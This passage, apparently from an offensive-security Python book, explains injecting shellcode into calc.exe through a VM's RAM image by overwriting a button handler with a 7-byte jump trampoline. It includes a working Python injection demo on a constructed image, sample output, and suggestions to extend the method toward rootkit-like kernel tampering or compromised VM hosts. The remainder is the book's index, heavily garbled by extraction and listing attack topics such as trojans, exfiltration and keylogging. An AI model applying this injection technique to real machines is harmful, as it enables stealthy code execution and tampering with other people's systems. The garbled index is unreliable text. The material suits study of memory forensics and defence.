All right! Let's walk through what all of this code does. When we iterate over each page, the code returns a two-member pair where page[0] is the virtual address of the page and page[1] is the size of the page in bytes. As we walk through each page of memory, we first find the physical offset (remember: the offset in the RAM image on disk) ➊ of where the page lies. We then open the RAM image ➋, seek to the offset of where the page is, and then read in the entire page of memory. We then attempt to find a chunk of NULL bytes ➌ the same size as our shellcode; this is where we write the shellcode into the RAM image ➍. After we've found a suitable spot and injected the shellcode, we take the address of our shellcode and create a small chunk of x86 opcodes ➎. These opcodes yield the following assembly:

mov ebx, ADDRESS_OF_SHELLCODE
jmp ebx

The byte 0xBB followed by a 4-byte little-endian immediate is mov ebx, imm32, and 0xFF 0xE3 is jmp ebx, so the trampoline is exactly 7 bytes long. It overwrites the first 7 bytes of the = button handler and clobbers EBX; unless your shellcode saves and restores both, the = button will not work normally once the shellcode has run. Keep in mind that you could use Volatility's disassembly features to ensure that you disassemble the exact number of bytes that you require for your jump, and restore those bytes in your shellcode. I'll leave this as a homework assignment.

The final step of our code is to test whether our = button function resides in the current page that we're iterating over ➏; the -7 in that test makes sure the whole trampoline fits inside the page, because consecutive virtual pages are generally not adjacent in the RAM image. If we find it, we calculate the offset ➐ and then write out our trampoline ➑.

We now have our trampoline in place that should transfer execution to the shellcode we placed in the RAM image.
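As an added example that is not part of the original chapter (and does not use Volatility at all), here is the same injection logic in plain Python 3 run against a constructed three-page stand-in for the RAM image. It finds the NULL slack, writes the shellcode, builds the 7-byte trampoline, refuses a hook whose trampoline would straddle a page boundary, and reads the patched hook back and decodes it as a sanity check. The page list, the virtual-to-physical map, the unmapped middle page, the 7-byte hook prologue and the int3 placeholder shellcode are all made up for the demonstration; the handler address 0x01005D51 is the one found above. Unlike the script in the text, it also returns the 7 bytes it overwrote, which is what a shellcode that restores the handler would need.

```python
import struct

PAGE_SIZE = 0x1000
TRAMP_LEN = 7  # mov ebx, imm32 (1 + 4 bytes) followed by jmp ebx (2 bytes)


def build_trampoline(target_va):
    """Encode 'mov ebx, target_va ; jmp ebx' as the 7 bytes the script writes."""
    return b"\xbb" + struct.pack("<I", target_va) + b"\xff\xe3"


def decode_trampoline(blob):
    """Recover the jump target from a patched hook, or None if the 7 bytes are not
    the mov ebx / jmp ebx pattern. Used as a read-back check after writing."""
    if len(blob) != TRAMP_LEN or blob[0] != 0xBB or blob[5:] != b"\xff\xe3":
        return None
    return struct.unpack("<I", blob[1:5])[0]


def find_slack(image, pages, vtop, size):
    """First run of `size` NULL bytes that lies inside one mapped page.
    Returns (virtual, physical), like the script's slack_space and physical+offset."""
    for vaddr, length in pages:
        phys = vtop.get(vaddr)
        if phys is None:              # page not backed by the image: skip it
            continue
        idx = image[phys:phys + length].find(b"\x00" * size)
        if idx != -1:
            return vaddr + idx, phys + idx
    return None


def locate_hook(pages, vtop, hook_va):
    """Physical offset of hook_va. Mirrors the script's (page[0]+page[1])-7 test:
    all 7 trampoline bytes must sit in the same page, because the next virtual
    page is generally not the next physical page in the image."""
    for vaddr, length in pages:
        phys = vtop.get(vaddr)
        if phys is None:
            continue
        if vaddr <= hook_va < vaddr + length - TRAMP_LEN:
            return phys + (hook_va - vaddr)
    return None


def inject(image, pages, vtop, hook_va, shellcode):
    """Patch a copy of `image`: shellcode into NULL slack, trampoline over the hook.
    Also returns the 7 original hook bytes, which a shellcode that wants the
    program to keep working afterwards would have to restore."""
    slack = find_slack(image, pages, vtop, len(shellcode))
    hook_pa = locate_hook(pages, vtop, hook_va)
    if slack is None or hook_pa is None:
        raise ValueError("no NULL slack found or hook not safely mapped")
    slack_va, slack_pa = slack
    patched = bytearray(image)
    saved = bytes(patched[hook_pa:hook_pa + TRAMP_LEN])
    patched[slack_pa:slack_pa + len(shellcode)] = shellcode
    patched[hook_pa:hook_pa + TRAMP_LEN] = build_trampoline(slack_va)
    return bytes(patched), {"slack_va": slack_va, "slack_pa": slack_pa,
                            "hook_pa": hook_pa, "saved": saved}


# --- constructed stand-in for a RAM image (not a real .vmem) -----------------
EQUALS_BUTTON = 0x01005D51                        # handler address found in the debugger
HOOK_PROLOGUE = b"\x8b\xff\x55\x8b\xec\x83\xec"   # constructed 7-byte function start
SHELLCODE = b"\xcc" * 16                          # constructed placeholder payload

# three virtual pages as (address, size); the middle one is deliberately unmapped
PAGES = [(0x00010000, PAGE_SIZE), (0x00020000, PAGE_SIZE), (0x01005000, PAGE_SIZE)]
VTOP = {0x00010000: 0x0000, 0x01005000: 0x2000}   # virtual page -> physical offset

_img = bytearray(b"\x90" * (3 * PAGE_SIZE))       # no NULL bytes anywhere ...
_img[0x0817:0x0817 + len(SHELLCODE)] = b"\x00" * len(SHELLCODE)   # ... except here
_img[0x2D51:0x2D51 + TRAMP_LEN] = HOOK_PROLOGUE   # 0x2000 + (0x01005D51 - 0x01005000)
IMAGE = bytes(_img)


def run_demo():
    """Inject into the constructed image and verify the result by reading it back."""
    patched, info = inject(IMAGE, PAGES, VTOP, EQUALS_BUTTON, SHELLCODE)
    hook_pa, slack_pa = info["hook_pa"], info["slack_pa"]
    info["decoded_target"] = decode_trampoline(patched[hook_pa:hook_pa + TRAMP_LEN])
    info["shellcode_in_place"] = patched[slack_pa:slack_pa + len(SHELLCODE)] == SHELLCODE
    return info


if __name__ == "__main__":
    for key, val in run_demo().items():
        print(key, hex(val) if isinstance(val, int) and not isinstance(val, bool) else val)
```

With the constructed layout the slack lands at virtual 0x00010817, the same low address the chapter's sample run reports, and the hook at physical 0x2D51; a hook placed in the last 7 bytes of a page is rejected rather than split across two non-adjacent physical pages.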

Kicking the Tires

The first step is to close Immunity Debugger if it's still running and close any instances of calc.exe. Now fire up calc.exe and run your code injection script. You should see output like this:

$ python code_inject.py
[*] Found calc.exe with PID 1936
[*] Hunting for physical offsets...please wait.
[*] Found good shellcode location!
[*] Virtual address: 0x00010817
[*] Physical address: 0x33155817
[*] Injecting shellcode.
[*] Found our trampoline target at: 0x3abccd51
[*] Writing trampoline...
[*] Done injecting code.

Beautiful! It should show that it found all of the offsets and injected the shellcode. To test it, simply drop into your VM and do a quick 3+3 and hit the = button. You should see a message box pop up!

Now you can try to reverse engineer other applications or services aside from calc.exe to try this technique against. You can also extend this technique to try manipulating kernel objects, which can mimic rootkit behavior. These techniques can be a fun way to become familiar with memory forensics, and they're also useful for situations where you have physical access to machines or have popped a server hosting numerous VMs.
[26] Download Immunity Debugger here: http://debugger.immunityinc.com/.

[27] If you want to write your own MessageBox shellcode, see this tutorial: https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/.

In dex
A N O TE O N T H E D IG IT A L I N DEX
A lin k in a n in dex e ntr y is d is p la yed a s th e s e ctio n tit le in w hic h th at e ntr y a ppears . B ecause s o m e s e ctio ns h ave m ult ip le in dex
mark ers , it is n ot u nusu al f o r a n e ntr y to h ave s e vera l lin ks to th e s a m e s e ctio n. C lic kin g o n a ny lin k w ill ta ke y ou d ir e ctly to th e p la ce
in th e te xt in w hic h th e m ark er a ppears .
A
Addre ss R eso lu ti o n P ro to co l,
ARP C ache P ois o nin g w ith S cap y
( s e e A RP c ache p ois o nin g)
Adju stT okenP riv ile ges f u ncti o n,
Win d ow s T oken P riv ile ges
AF_IN ET p ara m ete r,
The N etw ork : B asic s
ARP ( A ddre ss R eso lu ti o n P ro to co l) c ache p ois o nin g,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache
Pois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP
Cache P ois o nin g w ith S cap y
ad din g s u p porti n g f u ncti o ns,
ARP C ache P ois o nin g w ith S cap y
co din g p ois o nin g s c rip t,
ARP C ache P ois o nin g w ith S cap y
in sp ecti n g c ache,
ARP C ache P ois o nin g w ith S cap y
te sti n g,
ARP C ache P ois o nin g w ith S cap y
B
BH PFuzze r c la ss,
Burp F uzzin g
Bin g s e arc h e ngin e,
Kic kin g th e T ir e s
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
defin in g e xte nd er c la ss,
Bin g f o r B urp
fu ncti o nality to p ars e r e su lts ,
Bin g f o r B urp
fu ncti o nality to p erfo rm q uery ,
Bin g f o r B urp
te sti n g,
Bin g f o r B urp
,
Bin g f o r B urp
bin g_ m enu f u ncti o n,
Bin g f o r B urp
bin g_ se arc h f u ncti o n,
Bin g f o r B urp
Bio nd i, P hilip pe,
Ow nin g th e N etw ork w ith S cap y
BitB lt f u ncti o n,
Takin g S cre ensh o ts
Bro w se r H elp er O bje cts ,
Cre ati n g th e S erv er
bru te f o rc e a tta cks,
Kic kin g th e T ir e s
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g
Dir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g
Dir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g H TM L

Form A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Kic kin g th e T ir e s
in H TM L f o rm a uth enti c ati o n,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L
Form A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Kic kin g th e T ir e s
ad m in is tr a to r l o gin f o rm ,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
genera l s e tti n gs,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
HTM L p ars in g c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
pasti n g i n w ord lis t,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
prim ary b ru te -fo rc in g c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
re q uest f lo w ,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
te sti n g,
Kic kin g th e T ir e s
on d ir e cto rie s a nd f ile l o cati o ns,
Kic kin g th e T ir e s
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
ap ply in g l is t o f e xte nsio ns to te st f o r,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
cre ati n g l is t o f e xte nsio ns,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
cre ati n g Q ueue o bje cts o ut o f w ord lis t f ile s,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
se tti n g u p w ord lis t,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
te sti n g,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
build _w ord lis t f u ncti o n,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
Burp E xte nd er A PI,
Exte nd in g B urp P ro xy
,
Exte nd in g B urp P ro xy
,
Exte nd in g B urp P ro xy
,
Burp
Fuzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp
Fuzzin g
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Turn in g W eb site C onte nt i n to P assw ord
Gold
,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old

cre ati n g p assw ord -g uessin g w ord lis t,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g
Web site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g
Web site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old
co nv erti n g s e le cte d H TTP tr a ffic i n to w ord lis t,
Turn in g W eb site C onte nt i n to P assw ord G old
fu ncti o nality to d is p la y w ord lis t,
Turn in g W eb site C onte nt i n to P assw ord G old
te sti n g,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord
Gold
cre ati n g w eb a p plic ati o n f u zze rs ,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp
Fuzzin g
,
Burp F uzzin g
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
accessin g B urp d ocum enta ti o n,
Burp F uzzin g
im ple m enti n g c o de to m eet r e q uir e m ents ,
Burp F uzzin g
lo ad in g e xte nsio n,
Burp F uzzin g
,
Burp F uzzin g
sim ple f u zze r,
Burp F uzzin g
usin g e xte nsio n i n a tta cks,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
in sta llin g,
Exte nd in g B urp P ro xy
,
Burp F uzzin g
in te rfa cin g w ith B in g A PI to s h o w a ll v ir tu al h o sts ,
Kic kin g th e T ir e s
,
Bin g f o r B urp
,
Bin g f o r
Burp
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
defin in g e xte nd er c la ss,
Bin g f o r B urp
fu ncti o nality to p ars e r e su lts ,
Bin g f o r B urp
fu ncti o nality to p erfo rm q uery ,
Bin g f o r B urp
te sti n g,
Bin g f o r B urp
,
Bin g f o r B urp
Jy th o n s ta nd alo ne J A R f ile ,
Exte nd in g B urp P ro xy
,
Burp F uzzin g
Burp E xte nd er c la ss,
Burp F uzzin g
C
Cain a nd A bel,
Kic kin g th e T ir e s
CA NVA S,
Pyth o nic S hellc o de E xecuti o n
,
Pyth o nic S hellc o de E xecuti o n
channel m eth o d,
SSH T unnelin g
Clie ntC onnecte d m essa ge,
SSH w ith P ara m ik o
co de i n je cti o n,
Kic kin g th e T ir e s
,
Dir e ct C ode I n je cti o n
offe nsiv e f o re nsic s a uto m ati o n,
Dir e ct C ode I n je cti o n
Win d ow s p riv ile ge e sc ala ti o n,
Kic kin g th e T ir e s
co nfig d ir e cto ry ,
Gith ub C om mand a nd C ontr o l

co nnect_ to _gith ub f u ncti o n,
Build in g a G ith ub -A w are T ro ja n
Conte nt- L ength h ead er,
Man-in -th e-B ro w se r ( K in d O f)
co unt p ara m ete r,
Ow nin g th e N etw ork w ith S cap y
cre ate M enuIte m f u ncti o n,
Bin g f o r B urp
cre ate N ew In sta nce f u ncti o n,
Burp F uzzin g
Cre ate P ro cess f u ncti o n,
Cre ati n g a P ro cess M onito r
Cre d R eq uestH and le r c la ss,
Man-in -th e-B ro w se r ( K in d O f)
cty p es m odule ,
Deco din g th e I P L ayer
D
data d ir e cto ry ,
Gith ub C om mand a nd C ontr o l
Deb ug P ro be ta b , W in gID E,
Win gID E
Desti n ati o n U nre achab le m essa ge,
Kic kin g th e T ir e s
,
Deco din g I C M P
Dir B uste r p ro je ct,
Kic kin g th e T ir e s
dir _ bru te r f u ncti o n,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
dis p la y_ w ord lis t f u ncti o n,
Turn in g W eb site C onte nt i n to P assw ord G old
E
easy _ in sta ll f u ncti o n,
In sta llin g K ali L in ux
El J e fe p ro je ct,
Cre ati n g a P ro cess M onito r
encry p t_ post f u ncti o n,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
encry p t_ str in g f u ncti o n,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
env ir o nm ent s e tu p ,
Setti n g U p Y our P yth o n E nv ir o nm ent
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali
Lin ux
,
In sta llin g K ali L in ux
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E

Kali L in ux,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
defa ult u se rn am e a nd p assw ord ,
In sta llin g K ali L in ux
desk to p e nv ir o nm ent,
In sta llin g K ali L in ux
dete rm in in g v ers io n,
In sta llin g K ali L in ux
dow nlo ad in g i m age,
In sta llin g K ali L in ux
genera l d is c ussio n,
In sta llin g K ali L in ux
Win gID E,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
accessin g,
Win gID E
fix in g m is sin g d ep end encie s,
Win gID E
genera l d is c ussio n,
In sta llin g K ali L in ux
in sp ecti n g a nd m odify in g l o cal v aria b le s,
Win gID E
,
Win gID E
in sta llin g,
Win gID E
openin g b la nk P yth o n f ile ,
Win gID E
se tti n g b re akp oin ts ,
Win gID E
se tti n g s c rip t f o r d eb uggin g,
Win gID E
,
Win gID E
vie w in g s ta ck tr a ce,
Win gID E
,
Win gID E
Erro rs ta b , B urp ,
Kic kin g th e T ir e s
exfiltr a te f u ncti o n,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
exfiltr a ti o n,
Cre ati n g th e S erv er
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r
Exfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M
Auto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
encry p ti o n r o uti n es,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
key g enera ti o n s c rip t,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
lo gin f u ncti o nality ,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
posti n g f u ncti o nality ,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
su p porti n g f u ncti o ns,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
te sti n g,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
Exte nd er ta b , B urp ,
Burp F uzzin g
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
extr a ct_ im age f u ncti o n,
PC A P P ro cessin g
F

fe ed m eth o d,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
Fid ao , C hris ,
PC A P P ro cessin g
File C ookie Ja r c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
filte r p ara m ete r,
Ow nin g th e N etw ork w ith S cap y
fin d _m odule f u ncti o n,
Hackin g P yth o n’s i m port F uncti o nality
fo rw ard S SH tu nnelin g,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
Fris c h, D an,
Win d ow s P riv ile ge E sc ala ti o n
G
GDI ( W in d ow s G ra p hic s D ev ic e I n te rfa ce),
Kic kin g th e T ir e s
GET r e q uests ,
The S ocket L ib ra ry o f th e W eb : u rllib 2
GetA sy ncK eyS ta te f u ncti o n,
Sand box D ete cti o n
GetF ore G ro und W in d ow f u ncti o n,
Keylo ggin g f o r F un a nd K eystr o kes
getG enera to rN am e f u ncti o n,
Burp F uzzin g
GetL astI n p utI n fo f u ncti o n,
Sand box D ete cti o n
getN extP aylo ad f u ncti o n,
Burp F uzzin g
GetO w ner f u ncti o n,
Pro cess M onito rin g w ith W MI
GetT ic kC ount f u ncti o n,
Sand box D ete cti o n
GetW in d ow DC f u ncti o n,
Takin g S cre ensh o ts
GetW in d ow TextA f u ncti o n,
Keylo ggin g f o r F un a nd K eystr o kes
GetW in d ow Thre ad P ro cessId f u ncti o n,
Keylo ggin g f o r F un a nd K eystr o kes
get_ file _ co nte nts f u ncti o n,
Build in g a G ith ub -A w are T ro ja n
get_ http _head ers f u ncti o n,
PC A P P ro cessin g
get_ m ac f u ncti o n,
ARP C ache P ois o nin g w ith S cap y
get_ tr o ja n_ co nfig f u ncti o n,
Build in g a G ith ub -A w are T ro ja n
get_ w ord s f u ncti o n,
Turn in g W eb site C onte nt i n to P assw ord G old
GitH ub -a w are tr o ja ns,
Gith ub C om mand a nd C ontr o l
,
Gith ub C om mand a nd C ontr o l
,
Cre ati n g
Module s
,
Tro ja n C onfig ura ti o n
,
Build in g a G ith ub -A w are T ro ja n
,
Hackin g P yth o n’s i m port
Functi o nality
,
Hackin g P yth o n’s i m port F uncti o nality
,
Kic kin g th e T ir e s

acco unt s e tu p ,
Gith ub C om mand a nd C ontr o l
build in g,
Build in g a G ith ub -A w are T ro ja n
co nfig urin g,
Tro ja n C onfig ura ti o n
cre ati n g m odule s,
Cre ati n g M odule s
hackin g i m port f u ncti o nality ,
Hackin g P yth o n’s i m port F uncti o nality
im pro vem ents a nd e nhancem ents to ,
Kic kin g th e T ir e s
te sti n g,
Hackin g P yth o n’s i m port F uncti o nality
gith ub 3 m odule ,
In sta llin g K ali L in ux
GitI m porte r c la ss,
Hackin g P yth o n’s i m port F uncti o nality
H
hand le _ clie nt f u ncti o n,
TC P S erv er
hand le _ co m ment f u ncti o n,
Turn in g W eb site C onte nt i n to P assw ord G old
hand le _ data f u ncti o n,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Turn in g W eb site C onte nt i n to
Passw ord G old
hand le _ end ta g f u ncti o n,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
hand le _ sta rtta g f u ncti o n,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
Hash D um p o bje ct,
Gra b bin g P assw ord H ash es
hash d um p p lu gin ,
Gra b bin g P assw ord H ash es
hasM ore P aylo ad s f u ncti o n,
Burp F uzzin g
hex d um pin g f u ncti o n,
Build in g a T C P P ro xy
hiv elis t p lu gin ,
Gra b bin g P assw ord H ash es
HookM anager c la ss,
Keylo ggin g f o r F un a nd K eystr o kes
HTM L f o rm a uth enti c ati o n, b ru te f o rc in g,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g
HTM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Kic kin g th e T ir e s

ad m in is tr a to r l o gin f o rm ,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
genera l s e tti n gs,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
HTM L p ars in g c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
pasti n g i n w ord lis t,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
prim ary b ru te -fo rc in g c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
re q uest f lo w ,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
te sti n g,
Kic kin g th e T ir e s
HTM LPars e r c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Turn in g W eb site C onte nt i n to P assw ord G old
HTTP h is to ry ta b , B urp ,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
I
IB urp E xte nd er c la ss,
Burp F uzzin g
,
Bin g f o r B urp
IC M P m essa ge d eco din g r o uti n e,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Deco din g
IC M P
,
Deco din g I C M P
,
Deco din g I C M P
,
Deco din g I C M P
Desti n ati o n U nre achab le m essa ge,
Kic kin g th e T ir e s
,
Deco din g I C M P
le ngth c alc ula ti o n,
Deco din g I C M P
messa ge e le m ents ,
Kic kin g th e T ir e s
se nd in g U D P d ata gra m s a nd i n te rp re ti n g r e su lts ,
Deco din g I C M P
te sti n g,
Deco din g I C M P
IC onte xtM enuF acto ry c la ss,
Bin g f o r B urp
IC onte xtM enuIn v ocati o n c la ss,
Bin g f o r B urp
Ie xp lo re .e xe p ro cess,
Cre ati n g th e S erv er
ifa ce p ara m ete r,
Ow nin g th e N etw ork w ith S cap y
IIn tr u d erP aylo ad G enera to r c la ss,
Burp F uzzin g
IIn tr u d erP aylo ad G enera to rF acto ry c la ss,
Burp F uzzin g
im age c arv in g s c rip t,
Kic kin g th e T ir e s
,
PC A P P ro cessin g
,
PC A P P ro cessin g
,
PC A P P ro cessin g
,
PC A P P ro cessin g
ad din g f a cia l d ete cti o n c o de,
PC A P P ro cessin g
ad din g s u p porti n g f u ncti o ns,
PC A P P ro cessin g
co din g p ro cessin g s c rip t,
PC A P P ro cessin g
te sti n g,
PC A P P ro cessin g

im agein fo p lu gin ,
Auto m ati n g O ffe nsiv e F ore nsic s
IM AP c re d enti a ls , s te alin g,
Ow nin g th e N etw ork w ith S cap y
,
Ste alin g E m ail C re d enti a ls
Im munity D eb ugger,
Dir e ct C ode I n je cti o n
,
Dir e ct C ode I n je cti o n
im p m odule ,
Hackin g P yth o n’s i m port F uncti o nality
__in it_ _ m eth o d,
Deco din g th e I P L ayer
in je ct_ co de f u ncti o n,
Code I n je cti o n
in p ut ta gs,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
in p ut/ o utp ut c o ntr o l ( IO CTL),
Packet S niffin g o n W in d ow s a nd L in ux
,
Packet S niffin g o n W in d ow s
and L in ux
In te rn et E xp lo re r C O M a uto m ati o n,
Fun w ith I n te rn et E xp lo re r
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-
in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -
th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Cre ati n g th e S erv er
,
Cre ati n g th e S erv er
,
IE
CO M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r
Exfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M
Auto m ati o n f o r E xfiltr a ti o n
exfiltr a ti o n,
Cre ati n g th e S erv er
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r
Exfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M
Auto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
encry p ti o n r o uti n es,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
key g enera ti o n s c rip t,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
lo gin f u ncti o nality ,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
posti n g f u ncti o nality ,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
su p porti n g f u ncti o ns,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
te sti n g,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
man-in -th e-b ro w se r a tta cks,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-
in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-
in -th e-B ro w se r ( K in d O f)
,
Cre ati n g th e S erv er
cre ati n g H TTP s e rv er,
Man-in -th e-B ro w se r ( K in d O f)
defin ed ,
Man-in -th e-B ro w se r ( K in d O f)
main l o op,
Man-in -th e-B ro w se r ( K in d O f)
su p port s tr u ctu re f o r,
Man-in -th e-B ro w se r ( K in d O f)
te sti n g,
Cre ati n g th e S erv er
waiti n g f o r b ro w se r f u ncti o nality ,
Man-in -th e-B ro w se r ( K in d O f)
In tr u d er ta b , B urp ,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s

In tr u d er to ol, B urp ,
Burp F uzzin g
IO CTL ( in p ut/ o utp ut c o ntr o l) ,
Packet S niffin g o n W in d ow s a nd L in ux
,
Packet S niffin g o n W in d ow s
and L in ux
IP h ead er d eco din g r o uti n e,
Packet S niffin g o n W in d ow s a nd L in ux
,
Deco din g th e I P L ayer
,
Deco din g
th e I P L ayer
,
Deco din g th e I P L ayer
,
Deco din g th e I P L ayer
av oid in g b it m anip ula ti o n,
Deco din g th e I P L ayer
hum an-re ad ab le p ro to co l,
Deco din g th e I P L ayer
te sti n g,
Deco din g th e I P L ayer
ty p ic al I P v4 h ead er s tr u ctu re ,
Deco din g th e I P L ayer
J
Ja nze n, C liff,
Win d ow s P riv ile ge E sc ala ti o n
JS O N f o rm at,
Tro ja n C onfig ura ti o n
